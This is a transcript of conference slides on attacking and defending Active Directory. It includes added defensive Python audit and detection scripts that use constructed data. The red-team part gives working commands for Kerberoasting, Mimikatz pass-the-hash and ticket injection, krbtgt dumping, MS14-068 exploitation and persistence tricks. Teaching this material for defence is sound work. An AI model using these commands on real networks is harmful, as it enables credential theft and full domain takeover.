The Dark Side of Active Directory · 2015-12-02
TRANSCRIPT
presents
The Dark Side of Active Directory
Post-Exploitation like a boss without exploit
Guglielmo Scaiola
MCSE – CEI – CEH – CHFI – ECSA – ISO 27001 L.A. – Security+
[email protected] @S0ftwarGS
Guglielmo «S0ftwar» Scaiola
@S0ftwarGS
Security Consultant & Ethical Hacker
Microsoft System Engineer – A.D. expert
Trainer & Speaker
Some MC* & other certification…
Computer addicted for fun and profit….☺
www.wpc2015.it – [email protected] - +39 02 365738.11 - #wpc15it 2
Agenda
• Initial considerations
  - Why?
  - Some statistics...
  - The basics
• The dark side of the Force: Red Team
• Mitigation and detection: Blue Team
• Q & A
Enterprise A.D.
Blue or Red? Pink...
The dark side of the Force: Red Team
• Recon (Scanning & Enumeration)
• Gaining Access
• Maintaining Access
  - Privilege escalation
  - Backdoor
  - Lateral movement
  - Recon (Scanning & Enumeration)
  - Gaining Access
  - Pivoting
  - Recon (Scanning & Enumeration)
  - Gaining Access
• Covering Tracks
How to gain access?
RAT: remote access tools
• Delivery
• Staging and C2 (multi-protocol: HTTP, HTTPS, DNS, SMB, ...)
• Anti-forensics
• Bypass AV, firewall, logs and IDS/IPS
• Surviving proxies – proxy awareness (detect & use proxies)
Old School vs. New School
• Old School
  - Exploit to gain access from outside (Metasploit or other exploit)
  - Shell / reverse shell
  - Tunnel
  - AV evasion
• New School
  - Exploit to gain access from outside (RAT) + C2
  - Sysadmin tools
  - PowerShell (no AV detection)
Recon
• Users
  - dsquery user
  - net user
• Computers
  - dsquery computer
• Domain Controllers
  - dsquery server
• Password Policy
  - net accounts
  - Get-ADDefaultDomainPasswordPolicy -Identity MyDomain.local
• Group Membership (Administrators, Domain Admins, ...)
  - dsquery group
  - net localgroup
  - net group
The dark side of the Force
Warm-Up: Rename Administrator account?
• PsGetSid
• net localgroup administrators
DSRM Password
• Who remembers the DSRM password?
• Easy or hard? (can it be guessed?)
• Requires a reboot of the server + physical access (or ILO)
• So it's unlikely anyone could abuse it, right?
• When do you use it? ...and what happens if it isn't the one you expected? (what happens if an attacker resets it?)
Real World Enterprise
Privilege Escalation
SPN
setspn -s http/srv2k12r2.2k12.lan websvcs
SPN Purpose: A service principal name (SPN) is the name by which a Kerberos client uniquely identifies an instance of a service for a given Kerberos target computer.
SPN Format: serviceclass/host:port/servicename. serviceclass and host are required, but port and service name are optional. The colon between host and port is only required when a port is present.
Users o Computers?
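The SPN grammar on the previous slide and the "users or computers?" question are the two halves of the defender's audit: parse every registered SPN, then flag the ones that sit on user accounts, because those are the ones whose service keys are only as strong as a human-chosen password. The script below is an added example and is not code from the deck or from the tools it cites; the account inventory is constructed, and the names (websvcs, sqlsvc, backupsvc, the 2k12.lan hosts), the 365-day password-age threshold and the privileged-group list are assumptions. In a real audit the records would come from an LDAP query for objects with servicePrincipalName set.

```python
"""SPN parser and Kerberoast-exposure audit (added example, not from the deck).

The SPN grammar is the one on the slide: serviceclass/host[:port][/servicename].
Account records are constructed; in a real audit they would come from an LDAP
query for objects that have servicePrincipalName set.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Optional

# serviceclass and host are required; port and servicename are optional, and the
# colon is only present when a port is.
SPN_RE = re.compile(
    r"^(?P<serviceclass>[^/:]+)/(?P<host>[^/:]+)"
    r"(?::(?P<port>\d{1,5}))?(?:/(?P<servicename>[^/]+))?$"
)


@dataclass(frozen=True)
class SPN:
    serviceclass: str
    host: str
    port: Optional[int] = None
    servicename: Optional[str] = None


def parse_spn(text: str) -> SPN:
    """Split an SPN string into its parts; raise ValueError on malformed input."""
    m = SPN_RE.match(text.strip())
    if not m:
        raise ValueError(f"malformed SPN: {text!r}")
    port = int(m.group("port")) if m.group("port") else None
    if port is not None and not 0 < port <= 65535:
        raise ValueError(f"port out of range in SPN: {text!r}")
    return SPN(m.group("serviceclass"), m.group("host"), port, m.group("servicename"))


@dataclass
class Account:
    sam: str
    object_class: str                      # "user" or "computer"
    spns: list[str] = field(default_factory=list)
    pwd_age_days: int = 0
    member_of: list[str] = field(default_factory=list)


MAX_PWD_AGE_DAYS = 365                     # assumption: older than this is high risk
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}


def kerberoast_exposure(accounts: list[Account]) -> list[tuple[str, str, list[str]]]:
    """Return (sam, risk, service classes) for every *user* account that has an SPN.

    Any authenticated domain user can request a TGS for such an account, so the
    strength and age of its password is all that protects the key. Computer accounts
    are skipped: their passwords are long, random and rotated automatically.
    """
    findings = []
    for acct in accounts:
        if acct.object_class != "user" or not acct.spns:
            continue
        parsed = [parse_spn(s) for s in acct.spns]
        privileged = bool(PRIVILEGED_GROUPS & set(acct.member_of))
        risk = "high" if privileged or acct.pwd_age_days > MAX_PWD_AGE_DAYS else "medium"
        findings.append((acct.sam, risk, sorted({p.serviceclass for p in parsed})))
    return findings


# Constructed inventory; the first SPN is the one from the setspn slide.
SAMPLE_ACCOUNTS = [
    Account("websvcs", "user", ["http/srv2k12r2.2k12.lan"], pwd_age_days=700,
            member_of=["Domain Users"]),
    Account("sqlsvc", "user", ["MSSQLSvc/sql01.medin.local:1433"], pwd_age_days=30,
            member_of=["Domain Users", "Domain Admins"]),
    Account("SRV2K12R2$", "computer", ["HOST/srv2k12r2.2k12.lan", "HOST/SRV2K12R2"],
            pwd_age_days=12),
    Account("jdoe", "user", [], pwd_age_days=40, member_of=["Domain Users"]),
    Account("backupsvc", "user", ["backup/bk01.2k12.lan/2k12.lan"], pwd_age_days=10,
            member_of=["Backup Operators"]),
]

if __name__ == "__main__":
    for sam, risk, classes in kerberoast_exposure(SAMPLE_ACCOUNTS):
        print(f"{risk:6} {sam:12} {', '.join(classes)}")
```

The audit deliberately treats every user account with an SPN as a finding rather than trying to guess which passwords are weak: the fix on the Blue Team slides (low-privilege service accounts with long passwords, or moving them to managed service accounts) applies to all of them, and the risk ranking only orders the work.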
Requesting tickets (slide stolen from @timmedin ☺)
The attack... (no demo...)
• Find service accounts
  - setspn -T domainname -F -Q */*
  - Alternatively: C:\Tools\kerberoast-master\GetUserSPNs.ps1
• Identify user accounts, ignore computer accounts
  - GetUserSPNs.ps1 extracts the users directly
• Request tickets (PowerShell)
  - Add-Type -AssemblyName System.IdentityModel
  - New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "http/srv2k12r2.2k12.lan"
The attack... (2) (https://github.com/nidem/kerberoast)
• Request Ticket(s)
  - One ticket:
    PS C:\> Add-Type -AssemblyName System.IdentityModel
    PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"
  - All the tickets:
    PS C:\> Add-Type -AssemblyName System.IdentityModel
    PS C:\> setspn.exe -T medin.local -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
• Extract the acquired tickets from RAM with Mimikatz
  - mimikatz # kerberos::list /export
• Crack with tgsrepcrack
  - ./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
• Rewrite
  - Make user appear to be a different user: ./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500
  - Add user to another group (in this case Domain Admins): ./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 512
• Inject back into RAM with Mimikatz
  - kerberos::ptt sql.kirbi
Managing local admin passwords via GPP
• The security update addresses the vulnerability by removing the ability to configure and distribute passwords that use certain Group Policy preferences extensions.
Gain local admin privs via GPP
https://technet.microsoft.com/library/security/ms14-025
Privilege escalation – local – GPP
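MS14-025 stops new passwords from being set through Group Policy Preferences, but it does not remove items that were already deployed to SYSVOL, so the defender's job is to find any preference file that still carries a cpassword attribute and retire it. The scanner below is an added example, not code from the deck or from Microsoft; it walks a SYSVOL-like tree, reports where the attribute occurs and which account the item targets, and never decodes the value. The directory layout, GPO GUIDs and XML contents are constructed placeholders built in a temp directory so the script runs offline.

```python
"""Audit Group Policy Preferences XML in SYSVOL for stored credentials (added example).

Reports every element with a cpassword attribute; the value is never decoded.
The sample tree is constructed in a temp directory so the script runs offline.
"""
import os
import tempfile
import xml.etree.ElementTree as ET

# Preference files that could carry a cpassword attribute before MS14-025.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
# Attributes that name the account a stored credential belongs to.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")


def find_gpp_credentials(sysvol_root: str) -> list[tuple[str, str, str]]:
    """Return (relative path, element tag, account name) for each cpassword hit."""
    hits = []
    for dirpath, _dirs, files in os.walk(sysvol_root):
        for fname in files:
            if fname not in GPP_FILES:
                continue
            full = os.path.join(dirpath, fname)
            try:
                root = ET.parse(full).getroot()
            except ET.ParseError:
                continue                    # not well-formed XML: skip, not a preference item
            for elem in root.iter():
                if "cpassword" not in elem.attrib:
                    continue
                account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "")
                rel = os.path.relpath(full, sysvol_root).replace(os.sep, "/")
                hits.append((rel, elem.tag, account))
    return hits


# Constructed samples: one local-admin item with a stored password, one without.
GROUPS_XML_WITH_PASSWORD = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{CONSTRUCTED-CLSID}">
  <User clsid="{CONSTRUCTED-CLSID}" name="Administrator (built-in)" changed="2015-12-02 09:00:00">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="CONSTRUCTED-PLACEHOLDER-NOT-A-REAL-VALUE"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
                userName="Administrator (built-in)"/>
  </User>
</Groups>
"""
GROUPS_XML_CLEAN = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{CONSTRUCTED-CLSID}">
  <Group clsid="{CONSTRUCTED-CLSID}" name="Administrators (built-in)">
    <Properties action="U" groupName="Administrators (built-in)">
      <Members><Member name="2K12\\Workstation Admins" action="ADD"/></Members>
    </Properties>
  </Group>
</Groups>
"""


def build_sample_sysvol() -> str:
    """Create a throw-away SYSVOL-like tree and return its root path."""
    root = tempfile.mkdtemp(prefix="sysvol-sample-")
    policies = os.path.join(root, "2k12.lan", "Policies")
    for guid, xml in (("{CONSTRUCTED-GPO-GUID-1}", GROUPS_XML_WITH_PASSWORD),
                      ("{CONSTRUCTED-GPO-GUID-2}", GROUPS_XML_CLEAN)):
        folder = os.path.join(policies, guid, "Machine", "Preferences", "Groups")
        os.makedirs(folder)
        with open(os.path.join(folder, "Groups.xml"), "w", encoding="utf-8") as fh:
            fh.write(xml)
    return root


if __name__ == "__main__":
    for path, tag, account in find_gpp_credentials(build_sample_sysvol()):
        print(f"{path}: <{tag}> stores a credential for {account!r}")
```

Run it against \\domain\SYSVOL\domain\Policies instead of the sample tree to audit a real domain; any hit means the item must be deleted and the password it carried treated as compromised, because every domain member can read SYSVOL.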
MS14-068
MS14-068 – kekeo
If it fails:
runas /noprofile /netonly /user:idontcare cmd
ms14068.exe /domain:child1.newtest.lab /user:ut001 /password:Ut1Passw0rd /ptt
Persistence
DSRM Password
• https://technet.microsoft.com/it-it/library/cc754363(v=ws.10).aspx
• https://technet.microsoft.com/en-us/library/cc732714(v=ws.10).aspx
• HKLM\System\CurrentControlSet\Control\Lsa\DSRMAdminLogonBehavior
• Mimikatz (on the DC)
• token::elevate
• lsadump::sam
• DA EXT
• mimikatz "privilege::debug" "sekurlsa::pth /domain:ADSDC03 /user:Administrator /ntlm:7c08d63a2f48f045971bc2236ed3f3ac" exit
DSRM Password
Mimikatz – dump cleartext password
Dump password hash
Dump password with mimikatz
lsadump::lsa /inject /name:krbtgt
lsadump::lsa
lsadump::lsa /patch
DCSync
DCSync: 1) discover the DCs 2) query: replicate the user credentials via GetNCChanges
Intermezzo
Mimikatz – pass-the-hash
Mimikatz – over-pass-the-hash
• From AD online – mimikatz: lsadump::lsa /inject /name:administrator
• From NTDS.DIT and the System hive offline: NTDSXtract
• From client LSASS memory – mimikatz: sekurlsa::ekeys
mimikatz "sekurlsa::pth /user:admin2 /domain:child1.newtest.lab /ntlm:a87f3a337d73085c45f9416be5787d86" exit
Silver ticket
• It is a TGS
• The advantage is that there is no communication with the DC when it is used
• Not «liked» because the computer account password changes every 30 days
• While a Golden ticket is encrypted/signed with the domain Kerberos service account (KRBTGT), a Silver Ticket is encrypted/signed by the service account (computer account credential extracted from the computer's local SAM or service account credential).
• HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange = 1
Mimikatz – silver ticket and DC
Mimikatz – Golden Ticket
ADMT & SID History
Active Directory Persistence: SID History
Real World Enterprise
Skeleton key
AdminSDHolder
Malicious Security Provider
• HKLM\System\CurrentControlSet\Control\Lsa\Security Packages
Mitigation and Detection: Blue Team
Destined to lose?
• Attacks have changed:
  - The event itself is no longer what is malicious (the «how»)
  - What is malicious is the correlation:
    - Who did this?
    - From which host was it done?
    - When?
• Mitigate and log/correlate
• Every attack we saw in the two sessions leaves a trace in the logs.
• We must implement systems that raise an alert on the presence of a certain event, or of a certain number of events, and possibly correlate them (SIEM?)
The time of security = AV + firewall is over
Working together...
• Thinking an Active Directory domain is the security boundary
• Deploying systems with default settings
• Too many Domain Admins
• Not tracking/monitoring/documenting delegated access to Active Directory
• Over-permissioned Service Accounts
• Service Accounts with passwords less than 20 characters
• Using Group Policy Preferences to manage credentials
• Running non-essential roles and services on Domain Controllers
• Domain Controllers not patched promptly & unpatched systems (srv & wks)
• Domain Controllers not running a "recent" OS version
• The same local Administrator account passwords on multiple computers
• Active Directory Admins logging on to untrusted systems
• Not monitoring admin group membership
• Not cleaning up admin group membership
• Not automatically removing inactive (stale) user and computer accounts
• Keeping legacy authentication active on the network (LM/NTLMv1)
• Being too trusting – Too many Trusts or Trusts without proper security controls
The Most Common Active Directory Security Issues and What You Can Do to Fix Them by Sean Metcalf
https://adsecurity.org/?p=1684
• Control administrative access, even for a few minutes (who? when? why? do I log what they do?)
• Low-privilege service accounts with complex passwords
• Administrative access to A.D. only from a few secure clients; no administrative access from other clients
• No local administrator privileges for users
• Token «hygiene»
• Consider the Domain, not the Forest, as the security perimeter
• No identical local administrator password on multiple hosts
• Yes to UAC
• No PowerShell where it isn't needed
• No passwords in GPP/GPO, batch files, files, etc...
• No legacy OS (as far as possible in production)
• Patch the OS and the applications (especially on the client side)
Decalogue... Italian style
• DSRM Password
  - Id 4729 – set DSRM administrator password
  - Monitor the key HKLM\System\CurrentControlSet\Control\Lsa\DSRMAdminLogonBehavior
• DCSync
  - Create an allow list of the DC IPs and monitor DsGetNCChange from IPs not on the list
• Malicious Security Support Provider
  - Monitor the key HKLM\System\CurrentControlSet\Control\Lsa\Security Packages
• SID History
  - Monitor who has the attribute set and any changes to it
• AdminSDHolder
  - Monitor the ACLs of the AdminSDHolder object
  - Monitor users and groups with AdminCount=1
• Golden/Silver Ticket – MS14-068
  - Event IDs 4624 (account logon), 4672 (admin logon) and 4634 (account logoff) may contain the account domain field with the FQDN instead of the short name, or blank (or with characteristic strings). FOR NOW!!!
Detection
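Two of the checks on this slide, and the "who / from which host / when" correlation from the Blue Team opening slide, as an added example that is not part of the deck: a DCSync rule that flags DsGetNCChanges requests from any source not on the DC allow list, and a ticket-forgery rule that flags 4624/4672/4634 events whose account-domain field is an FQDN, blank or otherwise not the expected short name. The findings are then grouped per (user, source host) with a time window. The allow-listed DC addresses, the NEWTEST short domain name, the five-minute window and every record below are constructed assumptions; a SIEM would supply the real ones. The domain-field indicator is the fragile one, which is what the slide's "FOR NOW" means, so the DCSync rule should be kept even if that signal stops firing.

```python
"""Two Blue Team checks from the detection slide (added example, constructed data).

1. DCSync: DsGetNCChanges requests from an IP that is not an allow-listed DC.
2. Ticket forgery hint: logon events 4624/4672/4634 whose account-domain field is
   an FQDN, blank, or not the expected short domain name.
Anomalies are correlated per (user, source host) to answer who / where / when.
"""
from __future__ import annotations

from datetime import datetime, timedelta
from ipaddress import ip_address

DC_ALLOW_LIST = {"10.0.0.10", "10.0.0.11"}    # assumption: the legitimate DC addresses
EXPECTED_SHORT_DOMAIN = "NEWTEST"              # assumption: NetBIOS name of the domain
MONITORED_EVENT_IDS = {4624, 4672, 4634}

# Constructed records, already parsed into dicts the way a SIEM would return them.
REPLICATION_REQUESTS = [
    {"time": "2015-12-02T09:00:01", "src_ip": "10.0.0.11", "op": "DsGetNCChanges", "caller": "DC02$"},
    {"time": "2015-12-02T09:12:40", "src_ip": "10.0.5.77", "op": "DsGetNCChanges", "caller": "admin2"},
    {"time": "2015-12-02T09:13:02", "src_ip": "10.0.5.77", "op": "DsBind", "caller": "admin2"},
]
LOGON_EVENTS = [
    {"time": "2015-12-02T08:55:10", "id": 4624, "user": "ut001", "domain": "NEWTEST", "ip": "10.0.5.20"},
    {"time": "2015-12-02T09:10:05", "id": 4624, "user": "Administrator", "domain": "child1.newtest.lab", "ip": "10.0.5.77"},
    {"time": "2015-12-02T09:10:05", "id": 4672, "user": "Administrator", "domain": "", "ip": "10.0.5.77"},
    {"time": "2015-12-02T09:11:30", "id": 4634, "user": "Administrator", "domain": "child1.newtest.lab", "ip": "10.0.5.77"},
    {"time": "2015-12-02T09:20:00", "id": 4624, "user": "svc_backup", "domain": "newtest", "ip": "10.0.5.30"},
]


def _ts(text: str) -> datetime:
    return datetime.fromisoformat(text)


def dcsync_from_non_dc(requests, allow_list=DC_ALLOW_LIST):
    """Replication requests whose source address is not one of the known DCs."""
    return [r for r in requests
            if r["op"] == "DsGetNCChanges" and str(ip_address(r["src_ip"])) not in allow_list]


def domain_field_anomaly(event, expected=EXPECTED_SHORT_DOMAIN):
    """Reason string if the account-domain field looks forged, else None."""
    if event["id"] not in MONITORED_EVENT_IDS:
        return None
    domain = event["domain"]
    if domain == "":
        return "blank account domain"
    if "." in domain:
        return "FQDN instead of short domain name"
    if domain.upper() != expected.upper():      # short names are case-insensitive
        return f"unexpected account domain {domain!r}"
    return None


def correlate(events=LOGON_EVENTS, requests=REPLICATION_REQUESTS, window=timedelta(minutes=5)):
    """Group anomalous logon events per (user, host); attach DCSync hits from the same
    host that fall within `window` of the first anomaly."""
    findings = {}
    for ev in events:
        reason = domain_field_anomaly(ev)
        if reason is None:
            continue
        key = (ev["user"], ev["ip"])
        f = findings.setdefault(key, {"who": ev["user"], "host": ev["ip"],
                                      "first": _ts(ev["time"]), "last": _ts(ev["time"]),
                                      "event_ids": [], "reasons": set()})
        f["event_ids"].append(ev["id"])
        f["reasons"].add(reason)
        f["last"] = max(f["last"], _ts(ev["time"]))
    for req in dcsync_from_non_dc(requests):
        for (_user, host), f in findings.items():
            if host == req["src_ip"] and abs(_ts(req["time"]) - f["first"]) <= window:
                f["reasons"].add("DsGetNCChanges from non-DC host")
    return findings


if __name__ == "__main__":
    for f in correlate().values():
        print(f"{f['who']} from {f['host']} between {f['first']} and {f['last']}: "
              + "; ".join(sorted(f["reasons"])))
```

In the constructed data the single finding is the Administrator logon from 10.0.5.77 with an FQDN and then a blank domain field, followed two and a half minutes later by a DsGetNCChanges request from the same host; the ut001 and svc_backup logons pass because their domain field is the expected short name (compared case-insensitively).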
Microsoft Advanced Threat Analytics
• https://adsecurity.org
• http://blog.harmj0y.net/
• http://blog.gentilkiwi.com/mimikatz (better to follow him on Twitter)
• http://www.powershellempire.com
• http://www.labofapenetrationtester.com/
• But above all Twitter, Twitter and Twitter...
The secret: knowledge – the enemy: ignorance
Q & A
Questions and Answers
Recommended courses
OEC217 - PenTesting Techniques
EC001 - EC-Council Ethical Hacking & Countermeasures – CEH
OEC208 - Security for Network & System Administrators
For the future: a 2-3 day course on Active Directory security
Thanks to:
• Passingthehash - @passingthehash
• Joe Bialek - @JosephBialek
• Sylvain Monné - @BiDOrD
• Chris Gates - @carnal0wnage
• Matt N. - @enigma0x3
• Will Schroeder - @harmj0y
• Justin Warner - @sixdub
and in particular to Benjamin Delpy - @gentilkiwi for his support and to Sean Metcalf - @PyroTek3 for all the material he has made available
Stay Tuned...: @S0ftwarGS
OverNetEducation contacts
OverNet Education - info@overneteducation.it - www.overneteducation.it - Tel. 02 365738
@overnete - www.facebook.com/OverNetEducation - www.linkedin.com/company/overnet-solutions - www.wpc2015.it